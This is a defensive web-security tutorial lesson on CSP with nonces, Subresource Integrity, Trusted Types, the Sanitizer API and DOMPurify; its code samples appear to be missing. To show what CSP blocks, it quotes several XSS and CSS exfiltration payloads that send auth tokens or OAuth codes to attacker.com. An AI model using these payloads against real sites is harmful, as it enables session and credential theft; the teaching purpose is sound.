CSP, Trusted Types, and the Sanitizer API
Lessons 1 through 5 covered how XSS works, where it shows up in frameworks, how it escalates through OAuth, and how AI is introducing new vectors.
All of those lessons focused on preventing XSS at the code level: encoding output, sanitizing input, using textContent instead of innerHTML, and building the SafeHTML wrapper.
This lesson covers a different layer.
The browser itself has features that block XSS attacks even when our code has vulnerabilities.
A strict Content Security Policy prevents injected scripts from executing. Trusted Types prevents unsanitized strings from reaching dangerous DOM APIs. The Sanitizer API provides a native alternative to DOMPurify.
And Subresource Integrity prevents tampered CDN scripts from loading.
Here's what we'll cover:
- Content Security Policy: strict CSP with nonces, what it blocks, how to deploy it, and what breaks when we do
- Subresource Integrity for CDN-loaded scripts
- Trusted Types: enforcing sanitization at the browser level
- The Sanitizer API and
setHTML()as a native innerHTML replacement - DOMPurify configuration, framework integration, and limitations
- A prioritized action list for teams implementing these defenses
Content Security Policy
CSP is an HTTP response header that specifies which resources (scripts, styles, images, and connections) are allowed to load and execute on the page.
If a resource doesn't match the policy, the browser blocks it.
This is the single most impactful defense-in-depth measure against XSS, because it works even when an attacker successfully injects a payload into our HTML.
Why allowlist CSPs fail
The first generation of CSP policies used domain allowlists: script-src 'self' https://cdn.example.com https://www.google-analytics.com.
The problem, as Google's security team demonstrated in their 2016 paper "CSP Is Dead, Long Live CSP," is that allowlists are almost always bypassable.
If any domain on the allowlist hosts a JSONP endpoint or an Angular library with a template injection, the attacker can use it to execute arbitrary code.
Google found that 94.72% of real-world CSP policies could be bypassed this way.
The recommended approach is a strict CSP based on nonces.
Strict CSP with nonces
A nonce is a random value generated by the server for each HTTP response.
The server includes it in both the CSP header and the nonce attribute of every legitimate <script> tag.
When the browser receives the page, it checks each script: if the script's nonce matches the one in the header, it executes.
If it doesn't (because an attacker injected it and didn't know the nonce), the browser blocks it.
Here's what this looks like in Express:
Then in the HTML template:
If an attacker injects <script>alert(1)</script> via stored XSS, the browser refuses to execute it because the injected script doesn't have the correct nonce attribute.
strict-dynamic is an important addition.
It tells the browser: "Any script that was loaded by a nonced script is also trusted." This means our application's bundled JavaScript can dynamically load additional scripts (via createElement('script')) without each one needing its own nonce.
Without strict-dynamic, dynamically loaded scripts would be blocked, which breaks most modern JavaScript applications.
What CSP blocks in practice
Let's take the stored XSS attack from Lesson 2, where an attacker sets their display name to Cool Guy<img src=x onerror="fetch('https://attacker.com/log?t='+localStorage.getItem('auth_token'))">.
Without CSP, the browser renders the <img> tag, the image fails to load, and the onerror handler executes the JavaScript.
With a strict CSP, the browser still renders the <img> tag (images are allowed), but the inline onerror handler is blocked because inline event handlers are not permitted.
The browser logs an error to the console:
The attacker's payload is in the DOM, but it can't execute.
That's the value of CSP: it turns a successful XSS injection into a failed exploitation.
Blocking CSS exfiltration and network requests
In Lesson 2, we covered CSS-based data exfiltration where an attacker uses input[value^="a"] { background: url(https://attacker.com/log?char=a) } to leak CSRF tokens character by character. CSP blocks this by controlling the style-src directive.
If inline styles are not allowed (no 'unsafe-inline' in style-src), the injected <style> block won't apply.
Using nonces for styles, just like scripts, ensures only our own stylesheets execute.
The connect-src 'self' directive limits where fetch() and XMLHttpRequest can send data.
In Lesson 4, we showed the attacker using fetch('https://attacker.com/steal?code=' + code) to exfiltrate OAuth authorization codes.
With connect-src 'self', that fetch request is blocked because attacker.com is not in the allowed list.
The browser logs the violation, and the data stays in the browser.
frame-ancestors 'none' prevents our page from being embedded in an iframe on another site.
This replaces the older X-Frame-Options header and blocks clickjacking attacks.
It also prevents the iframe-based reflected XSS trigger from Lesson 2, where an attacker embedded our vulnerable search page in a hidden iframe on their site.
Deploying CSP without breaking the app
Every developer who has deployed CSP has broken something.
Inline event handlers like onclick="handleClick()" stop working.
Google Analytics scripts get blocked. Third-party chat widgets disappear.
This is expected. CSP is restrictive by design.
The deployment workflow uses report-only mode.
Instead of Content-Security-Policy, we set Content-Security-Policy-Report-Only with the same directives plus a report-to endpoint.
The browser evaluates the policy but doesn't enforce it.
Instead, it sends violation reports as JSON to our endpoint. We collect these for a few days, identify legitimate scripts that our policy would block, and adjust the policy before switching to enforcement mode.
Common issues and fixes when deploying strict CSP:
Inline event handlers (onclick, onsubmit, etc.) need to be replaced with addEventListener() calls in script files. This is the most common refactoring task and affects older codebases the most.
Third-party scripts (analytics, chat widgets, ads) that load from external domains work with strict-dynamic if they're loaded by our nonced scripts. If they inject their own inline scripts, those will be blocked. Some vendors provide CSP-compatible versions of their scripts.
The browser's developer console shows exactly which directive blocked which resource, which makes debugging practical. Every violation includes the directive name, the blocked resource URL, and the line number.
CSP in single-page applications
SPAs add complexity because the HTML is often rendered client-side.
If we're using a framework's static export (like next export or a static Vue/Vite build), there's no server to generate nonces per request.
In that case, we have two options.
The first is to use hash-based CSP instead of nonces. We calculate the hash of each inline script at build time and include it in the CSP header.
This works for static sites, but means any change to a script requires updating the CSP header.
The second is to serve the HTML through a server (or edge function) that generates nonces dynamically.
Next.js supports this through middleware that generates a nonce per request:
The nonce is then available in server components and layouts via headers().
Nuxt includes the nuxt-security module, which handles this automatically.
Angular's SSR can inject nonces during server rendering through its CSP_NONCE token.
If we're setting CSP via an HTML <meta> tag (because we don't control the server), there are limitations.
Meta tags can't set frame-ancestors, report-to, or sandbox directives. They also can't use report-uri for violation reporting, which means we lose the ability to monitor what the policy is blocking.
For full CSP protection, the HTTP header is strongly preferred.
Monitoring CSP violations in production
The report-to directive sends violation reports to an endpoint we control. This is essential for two reasons: catching legitimate breakage we missed during testing, and detecting actual XSS attempts that CSP is blocking.
Each violation report is a JSON payload containing the blocked URI, the directive that blocked it, the document URI, and the line number.
In production, these reports create a feedback loop: we see what's being blocked, determine if it's a legitimate resource we need to allowlist or an actual attack, and adjust the policy accordingly.
Services like report-uri.com and Sentry can aggregate these reports into dashboards.
Subresource Integrity
SRI lets us verify that a script or stylesheet loaded from a CDN hasn't been tampered with.
We add an integrity attribute to the <script> or <link> tag containing a hash of the expected file contents:
If the file on the CDN is modified (by an attacker who compromised the CDN or a maintainer who was social-engineered), the hash won't match, and the browser will refuse to execute it.
We covered SRI in Lesson 3 alongside the Polyfill.io incident.
The important limitation: SRI only works for files that are identical across all requests.
Polyfill.io generated separate bundles for each browser, so the hash changed each time, preventing SRI from being applied.
For dynamic CDN content, self-hosting is the only safe option.
To generate SRI hashes, use openssl or the ssri npm package:
Or use srihash.org, which generates the full integrity attribute from a URL.
Trusted Types
Trusted Types addresses a specific problem: DOM XSS happens because APIs like innerHTML, document.write(), and eval() accept plain strings.
Any string can contain a script. Trusted Types changes this by making those APIs reject plain strings and accept only special typed objects created through a developer-defined policy.
The list of APIs that Trusted Types locks down covers the sinks we've been tracing throughout this module: Element.innerHTML, Element.outerHTML, Document.write(), DOMParser.parseFromString(), setTimeout(), and setInterval() when called with strings, eval(), new Function(), and Element.setAttribute() for certain attributes like src on script elements.
These are the same sinks from Lesson 2's source-and-sink analysis and the framework grep commands from Lesson 3.
Trusted Types puts a gate in front of all of them.
The enforcement is activated through a CSP directive:
With this header set, passing a string to innerHTML throws a TypeError:
To make it work, we create a policy that sanitizes the input and returns a TrustedHTML object:
The RETURN_TRUSTED_TYPE: true option tells DOMPurify to return a TrustedHTML object instead of a string. This is the bridge between DOMPurify (which sanitizes) and Trusted Types (which enforces that sanitization happened).
The value of Trusted Types is that it prevents forgetting to sanitize from becoming a runtime error instead of a silent vulnerability.
Every call to innerHTML without going through a policy throws an exception. During development, this surfaces every unsanitized sink in the codebase. In production, it blocks the attack even if a code path was missed.
For deployment, the same report-only strategy that works for CSP also applies to Trusted Types. Start with Content-Security-Policy-Report-Only: require-trusted-types-for 'script' to identify all the places in the codebase where strings are being passed to sinks.
The violation reports will list the exact file, line, and API call. Fix them one at a time (by routing through the policy), then switch to enforcement.
On large codebases, Google's own experience rolling out Trusted Types internally showed that most violations cluster in a small number of utility functions and third-party library integrations.
Fixing those covers the majority of the codebase.
Trusted Types has been supported in Chrome since version 83 (May 2020) and in all Chromium-based browsers (including Edge and Opera).
Firefox shipped support in version 148 (February 2026), and Safari added it in version 26.1.
This means Trusted Types now works across all major browsers for the first time.
Angular has built-in Trusted Types support.
Setting the CSP header trusted-types angular angular#unsafe-bypass; require-trusted-types-for 'script' enables enforcement for Angular applications.
Angular's DomSanitizer (which we covered in Lesson 3) already integrates with the Trusted Types API when it's available.
The Sanitizer API and setHTML()
Trusted Types enforces that strings undergo a policy check before reaching sinks.
The Sanitizer API provides a browser-native way to do the actual sanitization. They complement each other: Trusted Types is the enforcement layer, the Sanitizer API is the sanitization layer.
To understand why the Sanitizer API exists, consider what happens when we use DOMPurify with innerHTML:
The HTML is parsed twice: once by DOMPurify and once by the browser. This is where mutation XSS can sneak in (as we covered in Lesson 2): if DOMPurify's parser and the browser's parser disagree about how to interpret the same HTML, the sanitized output can produce a different DOM tree than expected.
It also has a performance cost for large HTML strings.
The Sanitizer API eliminates this by combining parsing and sanitization into a single step:
The browser's own parser handles both sanitization and insertion, which means mutation XSS through parser disagreement is eliminated by design.
With no configuration, setHTML() strips <script> tags, inline event handlers (onclick, onerror), javascript: URIs, and other elements known to be XSS vectors. It also strips <iframe>, <embed>, <object>, and <use> elements.
The default is safe for most use cases.
If we need to allow specific elements, we pass a custom Sanitizer:
An important guarantee: even if the custom Sanitizer explicitly allows <script> or onclick, setHTML() still removes them. The method always strips XSS-unsafe elements and attributes, regardless of the configuration.
The Sanitizer configuration controls what else gets through, but it can't weaken the XSS baseline.
This is a significant difference from DOMPurify, where a misconfigured ALLOWED_TAGS list that includes script would actually allow scripts through.
setHTML() is also context-aware.
If we call it on a <table> element, it will drop any child elements that aren't valid inside a table (like <div>). This is something DOMPurify can't do because it sanitizes strings without knowing where they'll be inserted.
Firefox 148 (February 2026) shipped setHTML() as a stable API. Chrome has experimental support behind a flag. Safari has the spec on its roadmap but hasn't shipped stable support yet. Until setHTML() has full cross-browser support, DOMPurify remains the production choice.
But setHTML() is where this is heading: browser-native sanitization that doesn't require a library, doesn't have supply chain risk, and parses HTML once instead of twice.
DOMPurify configuration
Until setHTML() is supported by all browsers, DOMPurify is the tool we use today.
We've been using it since Lesson 1, and we built the SafeHTML wrapper in Lesson 3.
Here's the deeper configuration we promised.
Default behavior
With zero configuration, DOMPurify.sanitize(input) strips <script> tags, event handler attributes (onerror, onclick, etc.), javascript: URIs, and other known XSS vectors.
It allows a wide range of HTML elements (paragraphs, headings, lists, links, images, tables) and their standard attributes.
For most use cases, the defaults are safe.
Restrictive configurations
When rendering user-generated content, we should allow only the elements we need.
For a comment system that supports bold and italic:
For AI-generated output (the Lesson 5 scenario where markdown image tags can exfiltrate data), strip images entirely:
Trusted Types integration
When Trusted Types enforcement is active, DOMPurify can return a TrustedHTML object instead of a string:
This is how DOMPurify and Trusted Types connect.
DOMPurify sanitizes, wraps the result in a TrustedHTML type, and the browser's Trusted Types enforcement accepts it as safe for DOM insertion.
Framework integration patterns
In React, the SafeHTML wrapper from Lesson 3 centralizes DOMPurify usage:
In Vue, a computed property handles sanitization reactively:
In Angular, the built-in DomSanitizer handles most cases, but for situations where we need DOMPurify's configuration options, a custom pipe works:
Limitations
DOMPurify is a JavaScript library, not a browser feature.
This means it's part of our supply chain.
In early 2026, CVE-2026-0540 was disclosed: a bypass in DOMPurify's handling of XML noscript elements that could lead to XSS.
The fix was released in versions 2.5.9 and 3.3.2. This is the nature of library-based security: when a bypass is found, every application using the vulnerable version is affected until they update.
DOMPurify also parses HTML twice.
First, DOMPurify.sanitize() parses the string into a DOM tree, traverses it, strips dangerous elements, and serializes it back to a string.
Then, when we assign that string to innerHTML, the browser parses it again.
This double-parsing has a performance cost (negligible for small inputs, measurable for large ones) and is the reason the Sanitizer API exists: setHTML() parses once, sanitizes during the parse, and inserts directly.
When setHTML() is available across browsers, it's the better option for new code. DOMPurify stays for legacy browser support and for cases where we need the sanitized string (not DOM insertion).
What to do right now
These defenses are listed in order of impact. Each one addresses specific attacks from earlier lessons.
Start with a strict CSP header using nonces. This is the single highest-impact change. It blocks inline script execution (Lesson 1's blog comment attack), inline event handlers (Lesson 2's <img onerror> payloads), and network exfiltration to attacker-controlled domains (Lesson 4's OAuth code theft via fetch()).
Deploy in report-only mode first, fix legitimate breakage, then enforce.
Move session tokens to HttpOnly cookies if they aren't already.
This blocks the simplest token theft vector from Lesson 4 (reading localStorage.getItem('access_token')). CSP's connect-src adds a second layer of protection by preventing exfiltration even if the token is accessible.
Use DOMPurify for any HTML rendering from untrusted sources.
This covers user-generated content (Lesson 2), framework escape hatches like dangerouslySetInnerHTML and v-html (Lesson 3), and AI-generated output (Lesson 5). Use restrictive ALLOWED_TAGS configurations.
For AI output, strip <img> tags to prevent markdown image exfiltration.
Add Trusted Types enforcement.
Set require-trusted-types-for 'script' in the CSP header and create a policy that uses DOMPurify with RETURN_TRUSTED_TYPE: true.
This turns forgotten sanitization into runtime errors instead of silent vulnerabilities. With cross-browser support reaching all major browsers in February 2026, Trusted Types is now deployable for production applications.
When setHTML() has stable support in Chrome and Safari, migrate new code from DOMPurify to the native API. Keep DOMPurify as a fallback for older browsers and for cases where the sanitized string is needed without DOM insertion.
What's next
We now have the full picture: how XSS attacks work (Lessons 1-2), where they live in our frameworks (Lesson 3), how they escalate (Lesson 4), where AI introduces them (Lesson 5), and how to defend against them at the browser level (this lesson).
In Lesson 7, we'll tie it all together with a practical audit checklist: a systematic process for finding and fixing XSS vulnerabilities in an existing application.
References
- MDN, "Content Security Policy (CSP)" https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
- MDN, "Content Security Policy implementation" https://developer.mozilla.org/en-US/docs/Web/Security/Practical_implementation_guides/CSP
- Google, "Mitigate cross-site scripting (XSS) with a strict Content Security Policy" https://web.dev/articles/strict-csp
- Google, "Strict CSP" https://csp.withgoogle.com/docs/strict-csp.html
- OWASP, "Content Security Policy Cheat Sheet" https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
- MDN, "require-trusted-types-for CSP directive" https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Content-Security-Policy/require-trusted-types-for
- MDN, "HTML Sanitizer API" https://developer.mozilla.org/en-US/docs/Web/API/HTML_Sanitizer_API
- MDN, "Element.setHTML()" https://developer.mozilla.org/en-US/docs/Web/API/Element/setHTML
- Frederik Braun (Mozilla), "Why the Sanitizer API is just setHTML()" https://frederikbraun.de/why-sethtml.html
- Ollie Williams, "setHTML(), Trusted Types and the Sanitizer API" https://olliewilliams.xyz/blog/sanitizer/
- W3C / Google, "Trusted Types FAQ" https://github.com/w3c/trusted-types/wiki/FAQ
- The Register, "Mozilla decides Trusted Types is a worthy security feature" (December 2023) https://theregister.com/AMP/2023/12/21/mozilla_decides_trusted_types_is
- Firefox 148 release notes (Sanitizer API and Trusted Types shipped, February 2026) https://developer.mozilla.org/en-US/docs/Mozilla/Firefox/Releases/148
- DOMPurify by Cure53 https://github.com/cure53/DOMPurify
- sanitizer-api.dev (interactive Sanitizer API demo) https://sanitizer-api.dev/